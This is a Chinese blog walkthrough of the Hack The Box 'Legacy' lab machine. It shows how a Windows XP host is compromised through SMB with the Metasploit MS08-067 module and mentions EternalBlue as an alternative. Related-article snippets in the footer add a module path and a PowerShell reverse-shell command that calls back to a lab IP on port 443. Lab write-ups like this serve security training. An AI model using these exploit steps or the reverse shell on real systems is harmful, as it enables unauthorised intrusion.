No.51-HackTheBox-windows-legacy-Walkthrough渗透学习

最新推荐文章于 2024-08-06 17:20:59 发布
最新推荐文章于 2024-08-06 17:20:59 发布
阅读量877 收藏
点赞数
分类专栏: Hack The box 文章标签: python java linux 人工智能 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/104267845
版权

**

HackTheBox-windows-legacy-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines
靶机难度:容易(2.4/10)
靶机发布日期:2017年10月10日
靶机描述:
Prepared By: Alexander Reid (Arrexel)
Machine Author: ch4p
Classification: Official
SYNOPSIS Legacy is a fairly straightforward beginner-level machine which demonstrates the potential security risks of SMB on Windows. Only one publicly available exploit is required to obtain administrator access.
作者:大余
时间:2020-02-11
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.4,windows系统的靶机…
在这里插入图片描述
开放了139和445端口…
在这里插入图片描述
在这里插入图片描述
往下看可以发现windows xp sp3 类型的XP系统…
在这里插入图片描述
在这里插入图片描述
谷歌搜索,可以很容易发现利用MS08-067即可…

二、提权

打开MSF…
在这里插入图片描述
在这里插入图片描述
使用set rhost 命令通过HTB Legacy框的IP地址设置远程主机…
然后check检查是否可执行…
然后执行即可…
可以看到已经进来了…这边我先不进入shell
我利用meterpreter进行直接查找user.txt在哪儿…(meterpreter具有挺强大的功能,具体的自行查找谷歌)
在这里插入图片描述
可以看到已经找到了,直接过去查看即可…这里我就不查看了…很简单的操作!!我继续看看还有别的方法吗…
在这里插入图片描述
这里往下翻,发现还可以利用永恒之蓝,试试…

由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HacktheboxLegacy walkthrough
汗的博客
12-05 302
这个机器比较简单,其实也就是永恒之蓝ms17-010 nmap -sV -sC -p- 10.10.10.4 nmap结果 PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Service Info
Hackthebox :: Legacy 反思总结
Soul Blog
11-21 996
Hackthebox :: Legacy 反思总结 注意,这不是完整的渗透过程,只是总结 反思 这是一台windows XP的靶机,难易程度为简单,但是我却犯了很多错误 nmap查看靶机的漏洞我只是使用了一次,导致原来的两个漏洞只是扫出来了一个漏洞 扫描漏洞的时候没有准确的扫描,虽然结果是一样的,但是扫描的时间更长 过度借助了msf完成渗透过程,利用python脚本其实也可以 总结 靶机虽然简单,但是应该谨小慎微 nmap应该多次扫描,得到的结果一致才可以,在使用其他扫描工具的时候也应该这样
Hack the box靶机 Legacy
菜浪马废的博客
05-27 217
MS08067 我还有本MS08067实验室写的书呢 就用这个漏洞吧 考试的时候可以直接试一下永恒之蓝 cat user.txt时 需要用“”包裹住路径 serach -f 文件名 查找文件路径
【Hack The Boxwindows练习-- legacy
人间体佐菲的博客
10-28 1060
【Hack The Boxwindows练习-- legacy
Hack The Box::Legacy
aya3t的博客
10-10 113
Hack The Box::Legacy
Hackthebox walkthrough - Legacy(考点:smb利用 blue)
冬萍子癸水
04-27 593
namp走起可见又是smb。但这次没有像LAME靶机那样直接显示版本号。 于是nmap -p 445 --script vuln 10.10.10.4走一波。用NMAP的脚本扫端口 ok显示 ms08-067是个突破点 上msf,search ms08-067, use exploit/windows/smb/ms08_067_netapi , options, set rhost 10.10...
最新版 pdfjs-2.14.305-legacy-dist
05-18
最新版“pdfjs-2.14.305-legacy-dist”提供了对 PDF 文件的高效支持,使得用户无需依赖任何桌面软件就能在浏览器中查看和操作 PDF 文件。 此版本号(2.14.305)表示这是一个持续更新的项目,且此版本包含了之前版本...
termux-repositories-legacy_archive.torrent
05-20
termux-repositories-legacy-24.12.2019.tar termux-package-sources-legacy-24.12.2019.tar termux-v0.79-offline-bootstraps.apk bootstrap-archives-legacy-24.12.2019.tar termux-app-sources-legacy-24.12...
pdfjs-2.9.359-legacy-dist.zip
09-26
"pdfjs-2.9.359-legacy-dist.zip" 是该项目的一个特定版本的压缩包,其中包含了必要的文件和资源,用于在你的 Vue 项目中集成 PDF 预览功能。 在 "LICENSE" 文件中,你会看到 PDF.js 的许可协议,通常是 Mozilla ...
Armbian-unofficial-23.11.0-trunk-Onecloud-bookworm-current-6.1.6
02-19
Armbian-unofficial_23.11.0-trunk_Onecloud_bookworm_current_6.1.63_xfce_desktop.burn.img
Windows-10-8笔记本改Windows-7-教程.docx
12-17
这篇文档主要介绍了如何在搭载Windows 10或8操作系统的联想笔记本上安装Windows 7的步骤,特别针对联想G480和E49AL系列的机型进行了详细说明。以下是具体的操作步骤和知识点: 1. **BIOS设置**: - **Boot Mode**...
HTB Legacy[Hack The Box HTB靶场]writeup系列2
重新启程
02-01 1594
Retired Machines的第二台,前面的靶机都是比较简单的,通常都是适应性的训练,找到合适的突破点就可以了。 目录 0x00 靶场介绍 0x01 端口扫描 0x02 samba服务 0x03永恒之蓝 0x00 靶场介绍 Legacy这台靶机是windows靶机,我们之前在Vulnhub上使用的靶机基本上都是linux操作系统。那么我们就来看看这台靶机是什么情况。 先看下...
Hack The Box -----------------------Active
大方子
12-16 6926
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
Hack the box靶机 Bounty
菜浪马废的博客
06-03 459
两个页面都是没有权限不能访问 但是也没有扫出来登录页面 投个图 他们换了本字典 我懒得扫了 有过滤 上传了一个shell.php.gif绕过了 找到一篇博客 上传.config 使用nishang的Invoke-PowerShellTcp.ps1的时候 需要在这个文件末尾加入调用 Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443 然后就可以连接了 没有补丁 那ms15-051 完成 ...
HTB Popcorn[Hack The Box HTB靶场]writeup系列4
重新启程
02-02 4529
本题是retire的第四题Popcorn 目录 0x00 靶机情况 0x01 扫描端口 0x02 web目录文件扫描 0x03 get webshell 0x04 提权 0x00 靶机情况 本题是linux的靶机,整体看起来难度在3-4之间,比之前的题目有了一些难度,不过做过vulnhub的题目之后,linux的题目基本上怎么做都心里有数了。 0x01 扫描端口 先看下端口...
hackthebox注册教程
热门推荐
shy的博客
02-01 1万+
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www....
Python爬虫与MongoDB的完美结合
weixin_52392194的博客
08-03 812
我们掌握了在WindowsLinux系统下安装MongoDB,设计适合爬虫存储数据的写入规范,并通过实际爬虫示例展示了如何将爬取到的数据存储到MongoDB中。此外,还进行了MongoDB性能优化,提高了数据存储和查询的效率。
本地部署 Llama-3-EvoVLM-JP-v2
engchina的专栏
08-04 592
本地部署 Llama-3-EvoVLM-JP-v2
jupyter下载
最新发布
Einstein·Jun
08-06 515
Anaconda下载 参考链接:https://blog.csdn.net/qq_48372575/article/details/125630622 设置Jupyter Notebook的代码路径 在“此电脑”中搜索。删除最后一个""后面的的内容,包括“\”。 用记事本打开它。 按下ctrl+F就可以开始查找。查找内容如下: 找到之后,右键该文件,找到“发送到”,找到“桌面快捷方式”。然后就会发现桌面上已经建立好了!
ventoy-1.0.91-windows.zip
08-09
ventoy-1.0.91-windows.zip 是一个压缩文件,其中包含了"ventoy" 的软件安装程序,版本号为 1.0.91,适用于 Windows 操作系统。Ventoy 是一款开源的多重引导工具,它可以帮助用户在一个 USB 设备上创建一个多重引导...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值